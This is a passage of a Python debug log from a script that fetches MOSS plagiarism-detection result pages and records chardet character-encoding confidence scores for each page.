0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5537656378523245\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 
0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 27141\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 33956\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 27128\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 33943\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 27141\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 27128\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 33956\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 27128\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 33943\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 27129\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 33943\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 27128\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 33944\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 33943\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 
0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5141803583741161\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5148091255921858\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14-top.html\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19259\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19943\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32176\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19246\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19930\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19428\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19259\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19943\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32163\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at 
byte 19246\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19930\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32176\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19246\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19930\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32163\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19931\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19247\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19429\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32163\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19930\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19246\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19428\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32164\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5263681342534446\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not 
active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433467222841619\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32163\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.541686188119407\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic 
Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5241262908551579\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19474\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 22532\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19428\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 22519\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19461\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 22532\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19474\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19441\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20279\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 22519\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19461\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40574\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20266\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 22519\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19461\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19428\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19462\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20279\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error 
at byte 22520\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19429\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19461\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20266\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40574\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 22519\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19428\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20266\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40574\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20267\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40575\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20266\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40574\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5423208952924831\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 
0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5243190089355664\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.541686188119407\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 
0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5598098262023146\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5506336847281116\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:root:Processing URL: 